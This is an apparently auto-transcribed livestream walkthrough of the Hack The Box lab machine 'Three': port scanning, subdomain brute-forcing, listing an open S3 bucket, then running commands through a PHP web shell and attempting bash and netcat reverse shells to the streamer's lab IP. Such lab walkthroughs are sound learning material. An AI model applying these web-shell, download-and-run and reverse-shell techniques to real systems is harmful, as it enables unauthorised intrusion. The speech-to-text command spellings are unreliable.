Welcome to the stream. Thanks for stopping in. Glad to see you here. How are you doing today? Thanks for stopping in. Today we got more Hack the Box starting point. We are on 3. That's the name of the machine. It's in the tier 2 section of starting point. As you can see here, I am about 42% done with tier 1 of Hack the Box starting points. We already completed tier 0, and obviously tier 2 is next. And then, yeah, so we've already done these ones. This is actually still a free machine, so this is the last free machine in tier 2, and then we're going to get into VIP ones, which means you have to pay to get into that. So, just to let you know, I've already connected to the VPN, and I've already connected to the HackTheBox network, and the machine is already started, so let's go ahead and dive right on into it. So the first task, how many TCP ports are open? Submit answer. So we need to do a port scan. So to do that, I think the best way to do it fast is Rust scan. I always advocate for it because it's in-map but faster. For those that don't know, in-map is probably the most common. Actually, it is the most common port scanner for penetration testers, and even non-penetration testers use in-map. And in-map is good, and it does everything really well. It's just a little slow when you're scanning all 65,535 ports. So that's where Rust scan comes into play, for me anyways. So the command is rustscan-a, and then the IP address. So to get our IP address, we just gotta click the IP address right here in our HackTheBox dashboard, and then we can paste that in here. And then we're going to do -R for range, and we're going to scan port 1 through 65,535. 65,535, there we go. And just to let you know, Rust scan, it isn't installed on Kali Linux by default, but, excuse me, one moment, I got to turn down the music on my end, so forgive me. That's not the button I wanted to do. There we go. There we go. Much better. Okay. Yeah, my eardrums are being blasted. Alright, so... Alright, yeah. So RustScan isn't installed on Kali Linux by default, and you have to install that separately. I think it's in my second starting point video we install it, but if you don't know how to install it, I recommend just Google RustScan GitHub, and it's there, and the install instructions are not the clearest, but they're there, and you can figure it out with enough trial and error. But it's not terribly too hard to do. Could be a little weird though. But with that being said, let's go ahead and start the scan and see how many ports are open on 3, which once again is the name of the machine, just in case you forgot. So far we have 2 open, we have 22 and 80, but it's still scanning.
Hackerman. He's the most powerful hacker of all time.
Follow me.
Nut of P, thank you so much for the follow. Thanks for stopping in. How you doing today? Glad to see you here. Thanks so much for your support. Really do appreciate the follow. Thank you so much. Alright, so the port scan is over, and indeed we do have 22 and 80 open as the only ports. Rust scan can be slightly unreliable, so let's just run it one more time just to double check. It's mostly, it's right, I would say, in my experience, like 95% of the time. But there's only been one time where Rust scan didn't give me the results. It missed the port. So because that one time, I always run Rust scan twice. And the reason why I run it twice is because look how fast it is. You can afford to run it twice because Rust scan is super fast. So we got the same results. So we got 22 open and 80, most likely HTTP and SSH. So we're going to get into those probably a little bit later on. But for now, the answer to the task number 1 is how many TCP ports are open? The answer is 2. Submit answer. Task 2, what is the domain of the email address provided in the contact section of the website? So to figure this out, we need to navigate to the website. So we're going to click our IP address again. We're going to open up a new tab on our web browser. We're going to paste in the IP address, push enter, and see what happens. So we have a website called The Toppers. It looks like some sort of band, some sort of musical artist here that makes music, and they have tour dates, and maybe you can buy tickets and stuff on here. But we're looking for the email address, and here it is. Email, mail@thetoppers.htv. So this will be the answer. So once again, mail@thetoppers.htv. That is found on the towards the bottom of the home page in the contact section. So we can just paste this, commit answer. That's not right. What is the domain of the email address? Oh, it just wants the domain. So we can get rid of mail at here and then submit that. So it's just thetoppers.htv. Task 3. In the absence of DNS server, what Linux file can we use to resolve host names to IP addresses in order to be able to access the website that points to those host names? So the answer to that, we always modify it. We didn't have to modify it in this machine, but we usually do when we are on HackTheBox with web servers. It's the Etsy host file. So that's /Etsy/hosts. And that's the answer. Which subdomain is discovered during further enumeration? So we have to do some subdomain brute forcing here. So we already know it's going to be 2 characters and then dot and then the toppers.htv. But we need to figure out how to do, or we need to figure out the subdomains by doing subdomain brute forcing, and that's probably what the hint's going to tell us. Use an enumeration tool like wfuzz or ffuf, etc. Yeah, those are directory fuzzers. Fuzzing is basically you're just trying every single possible combination in hopes of finding something, essentially. Just go ahead and clear out our terminal here, and does that have UF installed? It is installed by default. Okay, so I don't know how to do subdomains, honestly. I don't really brute force subdomains too much. I never really had to do it terribly too much, but where is the flag for? Let's go to this GitHub and see if we can find some examples here. Oh, let's open up a new tab. We need to find subdomains. I'm gonna go to my my hacking notebook here over on my other monitor. I'm gonna get the command here. If I don't memorize commands, I just write them in my notes and I know how to get them at. So let's go ahead and do Alright, so here's what I got. Alright, so it's FFUF-W, path of the word list. So we're going to figure out which word list we're going to use in a sec. And then the name of our domain. So it's HTTPS. We don't want HTTPS. I don't think it's running HTTPS. I think it's just running regular HTTP. Yeah, it's not using S. So we can just scroll this. Your domain. So the domain is the toppers, and not .com, but it's HTTP. And I think MC's these are those it's looking for only. These are the status codes it's looking for only, I think. And then output, I kind of don't want it in a file. I want my output to be put on the screen, so we just get rid of that dash -o. And then, so we just got to figure out what word list we want to use. So let's go ahead and make a new tab in our terminal here, and we will. I don't think it's kind of Linux. Let's look up change directory /usr/share word list wfuzz. Let's go in here maybe, and then general injections, all web services. Let's go to general. What's in here? Subdomains, anything about subdomains? I'm not seeing subdomains. Let's go to seclist subdomains. Is this from seclist? Yeah. So this is subdomains top 1 million, 5,000. So this is the top 5,000 subdomains. So let's try this. So I just googled seclist subdomains and it brought me here. So the link, well, you just need to look up seclist discovery DNS, and then here's the file that I'm using. And this might not even work, so we'll see what happens here. So we're going to do we're going to copy this URL here. We're going to go back to our terminal, and we are going to clear this out. Let's do change directory // to go back to, so now we're in a word list. We do ls, we're back at the word list here. Oh, seclist is in Kali Linux by default. What am I doing? Change directory seclist. Fuzzing. So change directory fuzzing. ls. There's subdomains in here. All letters, 4 amounts, databases. I'm not seeing anything about subdomains, so. That's okay. It's not built into Kali, at least the list that I'm about to try to use, because none of these specifically say subdomains, so that's why I don't want to use them. But that's okay, because all we have to do is do a wget and then paste the URL that we just copied from the GitHub repository here, and it's going to download it. So if we do wget, permission denied. Okay, I got to do a sudo because we got to run that as root because we're in a root owned directory. So sudo and then same command. So once again, sudo wget and then the link of where you want to get the word list. Type in your sudo password. And then if we do ls, we should have subdomains. Yep, right there it is. So let's go ahead and clear this out and close this. And then for our word list, we'll back up here. So we'll get, so the location was user share, and you can put the word list wherever you want. I just wanted it in the directory fuzzing section of the sec list directory because that makes sense to me. But feel free to put that word list wherever you want. User share, word list, sec list, fuzzing, subdomains. Yeah. So that's. Oh. All right. So the full command we're running here. No. I want this one. I don't know why I wanted to pick this one. There we go. So ffuf-w, path to your word list. In this case, mine is right here. -u, and then the directory we want to fuzz. I think you have to put fuzz for subdomain. I'm pretty sure that's how this works. That's what my notes. That's what I have in my notes, anyways. And like I said, it's been a minute since I've done subdomains. And then I have this here. We'll see what happens and see if we can get a result here. Oh, that did not work. Token too long. What did we do wrong? What if I got rid of example? What if I get rid of the MC here and just specify all, maybe? I don't know. Is that necessary? What if I just get rid of MC altogether? Still not working. Is it the topper? No. Yeah, that's right. The toppers. Oh, you know what? I know what's going on here. We need to add the toppers to our Etsy host file. It literally told us to do that and we didn't do it. I thought, for some reason, I thought that I didn't have to do it. It just asked me a question, but we actually have to do it. So we'll do a sudo nano. Nano is a text editor. You can use Vim if you want. Nano, and then it is Etsy hosts. And we can get rid of this. This is one of the other machines that I did on HackTheBox. And we're going to replace that with this. So we need to go grab our IP address again. So back to our HackTheBox dashboard. Click on this link here and paste this. And then we're going to space over a couple times and do the toppers.htb. And we are going to X, enter. Okay. And we'll do cat Etsy host to make sure that it's, yep, so the configuration has changed, so that's good. We can clear this out. We can close out of this tab, and let's go ahead and go back to our original command right here. See if that works. Still not working. I'm not entirely sure what's going on here. What am I doing wrong? -w, that's my word list. Okay, that makes sense. -u, that's... I guess -u's not an option. No, it is. Yeah, it's an example. Use -u http / fuzz. So you put fuzz where you want to start fuzzing. So we want to fuzz the subdomain. So that makes sense to put fuzz in front of the domain the toppers.htb. I just don't understand why this isn't working. Let's get rid of this, I guess. If that does anything. Still not working. Token too long. Listen through all their token. I don't understand. Let's try a different tool. We don't have to use this one. I like to use Ferox Buster. So let's try to do Ferox Buster -H. How do I brute force subdomains on Ferox Buster? It's not really telling me. That's what I don't understand. Subdomains have always been like, I always have a hard time brute forcing these things. Let's go back to the hint. What was that other tool telling me to use? W-Fuzz. Do I have W-Fuzz installed? Yeah, I do. So, let's do a -H to see what's going on here. See what my options are. Yeah, so this is when you put fuzz where you want to fuzz as well. So, let's try... I think it's the same syntax, to be honest with you. Let's try W-Fuzz. See if that works. Nothing? Dude, I don't know how to brute force. Oh my gosh. How to brute force subdomains. I don't know why none of these are working. Just give me the command. I don't care about the idea behind it. I understand what it's doing. I just don't know how to specify. I want to brute force subdomains. Pure DNS? He's using pure DNS. What's the R argument on this? So wordless, obviously. Okay. Resolvers on TXT? I don't know what that means. I don't know what. Ferox Buster. Let's see if we can do on Ferox Buster. I like Ferox Buster as a directory fuzzer. I just am not entirely sure how to get it to do subdomains. Subdomain. The word subdomain does not pop up. Domain. Oh my gosh. Watch this try hacking video real quick. Gosh, no. I don't want these ads. We have to watch it. I just realized I don't have an ad blocker on my VM. I was like, why am I getting an ad? But it makes sense. Where's the command for this? How to root for subdomains. Subroot is a tool, so we can actually just install that and just run it. I know there's a million tools you can do this, but none of the tools tell you how to do it in the documentation. It's really annoying, actually. This should not take me this long to figure out how to do this. Very frustrating. So I just installed subroot by doing git clone https://github.com/therock/subroot.git. So we got that. So the next step is to, I'm just following this guide here. So that's how you install it. I guess we gotta go into the subroot. Do I have a subroot? Change directory. Oh man, whole directory? What is that? Wow. Change directory subroot. I don't like this tool already. So I just run subroot.py and then domain. Oh, it makes it easy. I don't have to specify wordless. They already have a default wordless built in the program. I actually kind of like that a lot, actually. Let's do Python 3 subroot.py and then our domain, which is the stoppers.htp. See what happens here. So far, nothing's going on. I think it only shows things that it finds. Alright, well that tool's running. Let's go ahead and try to find a different tool that might be a little bit faster. This is part of the Try Hack Me Takeover challenge. Here we go. Here's some better syntax. What's the difference between these two? Let's do this. Open up a new tab. We'll zoom in a little bit so you can see better, and then we will paste this here. Host is the toppers.htp. The URL is the toppers, toppers.htb, and then the word list, we got to specify that now. And hopefully this just works. Word list is /user/share word list, sec list, fuzzers, subdomains. Yep. Alright, so we'll try this command now. Why does it not work? I'm literally copy and pasting it right from the internet. From ff.me. Like, you would think that would be working. It says token too long. There's something wrong with our token. I don't understand what that means. Like, I don't know how to fix that. Like, I just went to the website. It's like, it still works. Like, normally. If I just hit. Well, let's try this. The toppers.htb. It should take us to the same website. No, I don't want a Google search. The toppers.htb. http:// the toppers.htb. Yeah, it takes you to the same place. I don't understand why it's not working. The toppers.htb. Token too long. It's wild, man. I don't understand what I'm doing wrong, man. Alright, so we can use GoBuster. So we can do this. GoBuster vhost-u http:// the toppers.htb and then /-w and then /user share sec list. And actually, if you go to discovery, that word list that we downloaded is actually in discovery DNS subdomains top 1 million, and then right there there's a 5,000. So we'll just do the 5,000 because it's the smallest one. We'd actually have to download that, but we can do, and then we can do /append-domain. That should give us some results. See what happens here. This subroot.py doesn't seem to be producing results. So I found s3.thetoppers.htb, and that's probably the answer. And actually, if you look at the top, it literally tells you the answer right here. When visiting s3.thetoppers, it gave us the answer here, but I still wanted to figure out how to do it via a tool. So now that we know, it's actually s3.thetoppers.htb. And that's probably why the machine's called 3, because we're going to be working with S3 buckets, by the way. S3 buckets are basically, they're Amazon Web Services, like where you put data at, is the best way I could put it. Which service is running on the discovered subdomain? Probably Amazon S3, if I had to take a guess. But let's just navigate there and see what's going on. So all we have to do is put s3. That didn't turn out the way we wanted to. We wanted this result. Oh my gosh. We wanted this. We expected to see status running, but so I'm like, ah. So how did that happen? Which service is running on the discovered subdomain? No, that's not working. Oh, you know what we can do? Oh, I know what we gotta do. I get it. So we gotta go to sudo nano etc host again. And we need to copy this, paste it, and then we need to put s.3. So we need a separate line in our etc host file for the s3 subdomain. So same IP obviously, but we just got to make a separate entry for the s3. So if we do cat/etc host, and there it is. So now we got 2 entries in our etc host, one being the regular, one being the subdomain of s3. So now if we go back, where's my, here we go, refresh the page here. Yep, status running. Okay, so that is that's good to go. That's what it told us to expect, so we know it's working. So there really isn't a clue on how to know. I just know S3 means it's Amazon S3, so I'm pretty sure that's probably the answer. So Amazon S3. Yeah. When you see S3, always think Amazon Web Services. Which command line utility can be used to interact with the service running on the discovered subdomain? That's a good question. I have no idea. Let's go ahead and click the hint. The Google search should help. Oh, thanks. All right, let's which command line utility can be used to interact with the service running on the discovered subdomain? So let's just Google S3 command CLI. Cool. Okay, that should give us the results. Command line interface AWS CLI. How do we use it? Is it just AWS CLI or is there? So it sounds like it's called AWS CLI, but thanks. How do we run it though? AWS CLI. We might have to install it, but let's try AWS CLI. I think that's the answer. Easy. So we just gotta install that, I guess. So let's go back to our terminal and let's clear this out. Do a sudo apt install AWS CLI. See what happens here. Alright, the install looks like it succeeded, so let's go ahead and clear out the terminal here, and let's go to the next task. The next task is, which command is used to set up the AWS CLI installation? Let's go look at that documentation we was just at. I don't know. Or maybe, is that the command I just ran? Hold on. Which command is used to set up the AWS CLI installation? I don't know. I thought I just installed it. That's it, can't hear. Refer to the official AWS CLI documentation. Let's go here then. I think we was already there. No, we were on the install. So we got the install done. So this is the configure now. So this is a different documentation. It looks like might be this AWS STS assume role. Yeah, I think it's going to be the oh, I wanted to copy that, not go to the link. Let's paste this in here. I don't think we need to do AWS, but let's do STS assume role, see if that's the answer. It's not the answer. Which command is used to set up the AWS CLI installation? We went to the link they told us to go to. I don't see any other commands that would even fit that. I've never really worked with AWS in a practical sense anyways. Like on a command line anyways. I've always done a lot of the AWS stuff through the GUI on the AWS website. Man, I don't think this has the answer. I think this is I think that the HackTheBox was written and then this was updated after the fact. I don't think the answer is here. So I'm just gonna Google Google that and see what happens. So I'm just gonna Google the question, see what happens. Make install. Well, that's not it. We know it ends in an E, and the first word is 3 letters. AWS configure SSL. That's not right either. Who's already here, but let's see what it says. Let's do Linux. I've already installed it, so I don't. I'm not sure what it's asking. Let's try this. AWS configure. Oh, I have to go back. Makes sense. Is it AWS configure? It is. Let's go. What is? Oh, let's see if I type that in my command. So, do AWS configure. Access key? I don't have an access key. Hit none secret key, none region name. I don't care about any of this. I don't even know what I just did. Okay, let's go to the next task. Which command is used by the above utility to list all the S3 buckets? Well, let's do list S3 buckets AWS CLI. See if that gives us some results. List buckets. Is that just a command? S3 lists all my buckets permission. Looks like it's just list dash buckets. Is that right? Is that what it's asking for? No, that's not it. AWS. I don't think I even need to do ALS CLI. I think. Oh, maybe I did. AWS -H. You really don't have a -A command help? Command? Well, yeah, I want help. Like, help. AWS help. If that's a command. Let's do AWS help pipe into buckets. I can't pipe that. Why? Can I do -- help? I don't like this help because it's like its own like program or something. I can't put it in grep. Very annoying, dude. Oh, that's why. Durr. I didn't put grep in front of that. That makes sense. Okay, so buckets does not exist. The word buckets does not exist anywhere in that help menu. Let's try bucket. Not. It doesn't exist. S3. Doesn't really help. I mean, I'm assuming it's AWS, S3, and then something, but I don't know what. Let's see if we can here. Refer to the official CLI documentation. Okay. LS debug. Oh, here we go. Oh, okay, so that makes sense. AWS S3 LS. Because LS is how you list directory, the contents of a directory, so it just makes sense to have that. Okay, AWS S3 LS. Well, it's not gonna work because I didn't specify. I didn't connect to a server. You can configure credentials by running AWS configure. Okay, well, we know the command now. It's AWS S3 LS. That should be it. The server is configured to run files written in what web scripting language? Well, it's 3 letters. Probably PHP, maybe? Or no, maybe SQL? Let's do a hand on this. One of the most common web scripting languages. Probably PHP. Yep, right. What a good guess. It is common. I mean, that's how I knew it. So submit the root flag. So we got to figure out how to log in that bucket. It didn't tell me how to like configure the identity of that. So AWS configure. Access key. I don't know what to put for this. How to configure AWS. Whoa. Let's go back to the... So AWS configure SSO command. Do I have to do that? I don't have credentials for this. That's the problem. I mean, maybe it's using default credentials. I don't have start your SSO start URL. Well, the URL is here, I guess. We'll put this as the URL. See if that works. Region, I don't care about that. Value, HackTheBox is the region. Cannot connect to endpoint, HTTP, Amazon Latest. Oh, that's not what the URL I told it to connect to, but okay. How to list S3 buckets from remote, no, not from, on a remote server. Oh, okay. So you specify the URL by endpoint URL. And then can I just do what was that command again? So AWS, what was it, endpoint URL something. Where'd it go? Endpoint dash URL. Endpoint dash URL. And then let's just put this URL here. See what happens? Okay, we got an error message here. Invalid choice. Valid choices are is endpoint not a valid choice? Where's try endpoint URL equals this. See if that does, no, same thing. What was that command? So maybe I gotta do S, man, I don't know. Can I just do like S3 LS here? List S3 buckets on remote server. I don't think Amazon's documentation is very good. I really don't. AWS S3, oh, this is the remove. Okay, AWS S3, LS, S3. So I think I gotta put S3 colon / in front of that. So S3 colon / and then I guess the URL again because it's remote. S3 colon / the same URL. Well, maybe if we got rid of this. See if that does anything? It doesn't do nothing. Oh, you know what? I know what I'm doing wrong. I think you have to put -- in front of that. Is that right? Unable to locate credentials. You can. How do I get the credentials? Oh, I don't understand. You can configure credentials by running AWS configure. AWS configure. Access key. I don't. Secret access key. Hail. Region name. HackTheBox is the region, baby. Default option format. Let's see. I just don't understand this. This configured thing doesn't work for me. Something out, Kirky. What are the stream things happening? How do you let us see here? Any cyber job offers yet? I mean, yeah. I mean, I get called probably at least twice a week about different job offers. I can't take any of them because I'm still on my active duty contract, so I can't even really entertain anything at the moment, just because I'm still active duty Air Force for the next 5 months, a little under 5 months. So most companies are trying to hire people right now. They don't, like, when you tell them like, oh, I can't take a job in 4 months, 5 months, they're like, yeah, talk to us later. That's what I tell everybody. I'm like, yeah, I can't take it down until like 4 or 5 months from now. And they're like, yeah, we don't want to talk to you. Call us back then. Is all that matters. Yeah, I mean, yeah, I get a lot of emails, I get a lot of calls, which is really good. So we'll see what happens. I just gotta wait a little longer, and then I can start, you know, officially, you know, landing a job. I have a penetration testing internship coming up in just under a month now. So at the end of the month, I start my skill bridge internship, which basically like is a way for transitioning. Yeah, I can skill bridge. So yeah, my skill bridge is on the 27th. It starts, and I already have that set in stone. So I'm hoping to, you know, sign on with that company, but we'll see what happens. Is Kirk? Oh my God, Kirk! Oh my God, you didn't tell me this. I should have known better. It says Kirky in your name, Kirk. Oh my God. Yo, man, how you doing? How you doing, man? Thanks for stopping in, man. But yeah, so my skill bridge is at the end of the month, and then we'll see what happens. Hopefully it goes good. I'm excited for it for sure. I'm ready to get out of the Air Force. That's for sure. Was 7 Eagle? Yeah. I use 7 Eagle to basically get into with my skill bridge employer, because they didn't have a skill bridge program set up, so I used 7 Eagle to basically facilitate that. I've just been doing GRC in my company. You know, I'm probably pretty good at GRC since like my whole degree's in it, but it's not that fun. I like penetration testing. So that's why I got a penetration testing internship, even though it probably pays a little bit less. That's, you know, the money's in GRC for sure, like as far as pay goes, but I wanted to be a hacker, man. I took the pay cut for that. I mean, I can always go into GRC for sure. I think I can definitely, you know, do good in that, but I really just like breaking into machines, even though I can't even figure out how to break into this open S3 bucket right now. This should be easy, but I've never messed with S3 buckets, so this is why you get on HackTheBox, so you can learn this stuff. I don't know how to break into this S3 bucket right now. It's really annoying. Well, it's not really annoying, it's just a little frustrating, because when I'm on stream, I feel pressure to get results to the screen fast, so people won't be like, oh, this guy sucks, so doesn't know what he's doing. The truth is, I just learn as I go. Everything's a new challenge. Where was I at? Oh yeah, we got to get the root flag. So we have enough information. I just got to figure out the command to list the S3 buckets, which they gave us the command, but I don't know how to designate the remote server. And then I did designate the remote server, but then it's telling me that I need to configure the identity, but I don't know how to do that. Throw the command in front of the CLI? I don't know what you mean by that. Do I have to configure? Yeah. Oh, I have to. Credential files. So credentials and config files are updated when you run command AWS figure. The credentials file is located at home AWS credentials. You have it after the endpoint? Oh, like put this here in front of this? Maybe. See if that works. I think it's right. I think either one of those works. either way you put it. It's just telling me that the credentials are right. But I do AWS configure, and I don't know what to put here for the access key because I don't. That's some help. Well, let's look up. Yeah, like it tells me what to do after AWS configure. It tells me to run AWS configure, but it doesn't tell me what to do after that. It just gives me a configuration file. Let's do how to get what was that asking for? Credentials or access key. Man, we've been streaming for over an hour now. I haven't figured this out in an hour yet. That's wild. I'm not. See if I can find it over here.
Hacker Man. He's the most powerful hacker of all time.
Follow me.
Thanks, Kurt, for the follow. Really do appreciate it, man. Thank you for the support, dude. Thanks for stopping in, man. You made my day. I think I got it over here. So let's try this. Oh, maybe you have, I don't know what that means, but let's try AWS ls - endpoint. S3 ls - endpoint, and then specify S3 : / the toppers HTTP. See what that happens? See what happens? Alright, that's good. We made some progress. We got shell.php, but now that looks like some kind of shell that's just built into this. So how do I? Is the shell.php already there? It looks like the shell.php is already there. If I just did the toppers.htb / shell.php $cmd equals who am I? See if that works. No, I don't want to Google search that. I wanted to actually do that. People always like, do you want to Google search that? Like, no. http : / That worked. Look at that. We can run commands. So if you run this command here, AWS S3 ls. So we had a command, right? The only difference was when you do AWS configure, just make it anything. So as you can see here, I just did a. So it doesn't matter what you put there, just put something. And then this command will work. So here's the command that we're struggling with. And the reason why we're struggling is because we didn't set this up right. So when you do AWS configure, literally fill out the fields in any way possible. Just don't leave them blank. So I ran this command here after doing the AWS configure, and then we got HTA access, index.php, and shell.php. Well, PHP cells typically go like this. So shell.php, and then question mark cmd equals, and then whatever command you want to run. I ran who am I got data. So we can actually probably just do this. We can probably just do this. So let's go ahead and clear this out, and we do a netcat-lmvp 443 because so we're setting up a netcat listener on 443, and we just need to trigger a connection here. So let's do the rev shells. So a good tool to use to keep in your bookmarks is revshells.com. So if we do our IP address, which my IP address currently is 10.10.17.67, and then we want to listen on port 443, and we want to do, let's see if netcat's installed. If netcat's installed, then we can just do like we want to connect with bin bash. So we can do like this command here. Now you can, what's nice about rev shells is that you can just like modify it like incrementally. You can try different shells, you can try different commands, like there's all kinds of different ones here. But I think netcat here, I think this is gonna work. So if I do this, but since this is URL, where's it at? Where's my web shell go? Since this is in a URL, we gotta URL encode this. So what's gonna open up URL encode? I think the easiest way to do it is just Google URL encoder, and then click the first link. So urlencoder.org, and just paste your command that you want to run here, and then hit encode, and then it will URL encode this. So you're going to take this here, copy this, and then we're going to put it right here for the command. And the reason why you got a URL encode is because you can't put spaces in a URL, and that's why you see all these %20s, because %20s is a space. So we're going to run this command and hopefully catch a shell. See what happens. I don't think it worked because, yeah, it didn't work. Okay, so that's not a big deal. Netcat might not be installed, so let's just try this. So instead of trying netcat, because if netcat's not on a machine, that obviously wouldn't work. So let's just do a regular bash command. And we know this box is Linux. Well, do we know this box is Linux? That's a good question. I had a hunch it was Linux, but I could be wrong. Let's do this. If we do ls for the command, okay, so we do know that this box is Linux because if we run ls is not a Windows command. We get this. So I guess ls works in PowerShell. So let's do cat %20 shell.php. See if that works. Okay, well, maybe. Let's run ps. PID TTY times CMD. Let's try to do like a more %20. No, I want to do that. Is PS a Windows command? Sounds like a new question. We'll figure it out real quick. Is PS a... Yeah, PS is not a Windows command. And let's go ahead and open up PowerShell. Is it a PowerShell command? I'm doing this on my personal computer right now. That's why you guys can't see it. But so PS is a PowerShell command, but judging by the results of what I got here, this is definitely a Linux output, and this is not PowerShell output. So we can confirm, or at least with pretty good certainty, that this is a Linux box. So let's do this. So once again, rev shells. We're going to do the first one, which is bash I. Fill in your IP address here, put in your port that you're listening on here, and then just change the shell to bin bash, and then copy. And what we're going to do, and you can actually just highlight this like this, copy, and then we're going to URL encode this. So we're going to paste this here. This should work, and then encode this URL, and then we will do copy. See if that works. That didn't work. Dang, man. Well, let's try something here. Let's do... I'm going to remove this file, rev.exe, because I don't need it. I think I used that for something else one time. Remove rev.exe. Remove -rf. Right. Let's do make directory. No. Change directory, HackTheBox. How did you get the key? I didn't actually get the key. I just put a bunch of A's. Change directory, HackTheBox. We're gonna do make directory. What's the name of this? 3. Change directory 3. And we're gonna touch test.txt, and we're gonna host it. So we're gonna do Python 3-m http.server to host all the files in the 3 directory, which is only test.txt. And what I want to do is do a test here. So if we do a command wget http://10.10.17.67, see if anything happens here. Nothing happened there. We got a freeze. So it automatically URL encoded it. wget %20 http://1010. Oh, that's why. Let's try 17. I did 16 instead of 17. See what happens here. Oh yeah, that works. Okay, so as you can see on my server logs that the download was successful. So wget is a tool to download files. I hosted this and it successfully downloaded my test file. So we know that this is in fact Linux because wget doesn't work on Windows typically unless you install it separately, but it's not in Windows by default. So I'm still pretty sure that this is Linux. So we could probably just do this. I don't understand. I'm actually kind of confused why this one didn't work. Bash read line. Can we do... Well, let's just do this then. Let's do... So I'm pulling this from my notebook here. But basically we're going to do this. So let's do nano, and we will do rev.sh. SH is a bash script, and rev is just short for reverse shell. We're going to paste this in here. So we'll start with, as you can see, the shebang, which is the hashtag /bin bash, and then our command is bash -i. This is basically the same command I was trying to run earlier, but we're going to put this in a script. And we want to do 443 because that's what we're listening on. Our IP address is 17.67. And if we do X, enter Y, and we do clear, let's do Python 3-mhttp.server 80. We're going to host that file. We're going to download that file. So we'll do wget http://10.10.17.16. Oh my gosh. 10.17.67 / what I name the file? Oh yeah, rev.sh. Where is it running Python from? It's not running Python. So I made a file. Let me back up here. So if I do a cat nano, not cat nano, cat rev.sh. So I made a file called rev.sh. This is a bash script, and this bash script is just basically a reverse shell. It's just a connection to my machine. That's what this command is doing. So bash -i, and then this /dev TCP, and then this is my IP address, and this is my listener address, which is 443, and then that. This is like a standard reverse shell bash script. It's like probably one of the most simple ones you can do. So I'm just hosting that file, and then I'm hosting the file with my Python web server, which is Python 3-mhttp server 80. Ooh, not server 80. And then, so I want to download this by doing wget http://10.10.17.67-rev.sh. So, and also its URL encoded is indicated by the %20 here. So hit enter on this. This should download the file. It did. So we go back to our server logs. It successfully downloaded the reverse shell file. I still got my listener running. I do. So we can actually switch over to here. So this is my listener. We're still listening on port 443 on all addresses. And then we can do now, let's do chmod +x rev.sh. So this is changing the permissions of rev.sh to be executable. That command should have just ran. If not, we're going to try to do a %20 here, and then we'll do another %20 here just in case it needs it. Chmod %20 +x %20 rev.sh. So that should work. But then again, the plus might actually, you know what, let's just do this. So the command is chmod +x, because the plus might change from the URL encoding, +x rev.sh. We encode this. Yeah, I was right. It did URL encode that. See, we got a 2bx. So we need to run this. So always URL encode your commands because, yeah, let's try that. Now that we've changed the permissions, now all we have to do, if we just run ./rev.sh as a command, that's basically running it. That's all we're doing is running the file that we just put on there. URL code that command. Paste this. That should work. No, it didn't. Why? Why is this not working? trying to think of another way to do this. I guess we could do this. Can we just do ls and see what's in here? Can we do ls // see if that does anything. Okay, so maybe can I do root? See if we can go in a root. Can I view the contents? Come on now, I didn't want that. /root. Yeah, I don't want to Google search this, dude. I don't know why it keeps doing that. HTTP : // Can I see the contents of root? Doesn't look like nothing's in here. Can I do well, we can see the contents of this, so let's do home. See what users' home directories we can see in here. Come on, why does it keep doing that? If I type in home here, it wants to just automatically revert back to a Google search. HTTP : / slashes. Can I see? So we got a service account, so we can do like /svc to enter on this. No, svc, not svd. I'm not seeing it. Home svc. So we can't see the contents of svc. What if we did ls and then our home directory of the data user? See if that does anything. Man, it just randomly does it too. It's like no consistency. HTTP : // I don't want the home. We'll do squiggle, which means the total sign means like the user's home directory. So it'll be the data home directory if it has one. HTTP : // see if that works. We're doing ls. Nothing's there. What if I do los? There's a flag somewhere on this machine that we should be able to read. Thought maybe, but can I just do like cat flag.txt? Is that a thing? No. Probably in a var directory. Alright, let's try var /. There's a flag. Okay. So it's in the var directory. I should have known better because data doesn't have a home directory. Its home directory is var /dub essentially. So if we do var flag.txt, we will get the flag. No. Oh, we did ls. We gotta do a cat. So replace ls with cat. So this is how you get the flag, people. It's http : //thetoppers.http/shell.php ? cmd equals cat // var /flag.txt. Enter. There's the flag. we didn't have to get a reverse shell, although it would have been nice. That's the flag. And actually, I was going to try to get a reverse shell on it, but the fact that I submitted the root flag, it automatically shut down the system, unfortunately. I was going to sit here and try to get a reverse flag, or a reverse shell, and because there's plenty more techniques we can try, but unfortunately we're running out of time. This has went on for an hour and a half now. This is way longer than I normally like to go. This one took a while unfortunately, but we did learn a lot about S3 buckets, I guess. S3 Amazon documentation is not the best, in my opinion. But we got it. We got the flag, and that's all that matters, at least for this exercise. Like I said, it would have been nice to have more time to try to get a reverse shell and actually did it the way I wanted to. But doing the flag.txt might be the only solution, because it could be blocking the traffic too, because I felt like all those reverse shells I was trying should have worked, but you know. But then again, we could have probably found a way to do it eventually, but like I said, we got the flag, and that's what all that matters. The machine shut down, so I don't really have time. Free machines completed. Congratulations, you have owned all the free tier 1 machines. You have unlocked tier 2. Nice. We still have, I have paid tier 1 machines that I'm going to do before I move on to tier 2. So stay tuned for that. Next week we will, well, sorry, there will not be a stream next week because I'm going to be on vacation, but 2 weeks from now we're going to start with Ignition and continue on with this HackTheBox starting point series. Like I said, I'm learning a lot. There's a lot. These are all very easy challenges, and even though it took me an hour and a half, I would still consider it easy challenges because there wasn't a whole lot going on. I do like these little easy challenges because there are some technologies here that I haven't really worked with. As you can tell, as Amazon S3, I haven't really touched a whole bunch, at least as far as like penetration testing goes. So pretty cool, pretty cool. With that being said, thanks for watching, guys. Thanks for hanging out. Really do appreciate your support, and hopefully you learned something today. And yeah, thanks for hanging out. Let's go ahead and cut the music here. Like I said, next stream will be 2 weeks from now, same time as tonight. So that's going to be 9 p.m. Eastern time. That is 6 p.m. Pacific time. I do every Friday with the exception of next week. So see you next stream. If you haven't followed the channel already, follow the channel. If you enjoyed the content, and then subscribe to my YouTube channel. All my streams get ported to YouTube, so if you can't catch a live streams, you can always check out my YouTube channel where I post a recap of the stream. Alright, enough rambling. I gotta go. Thanks for watching. Peace out. Take care. Have a good one. Kyser.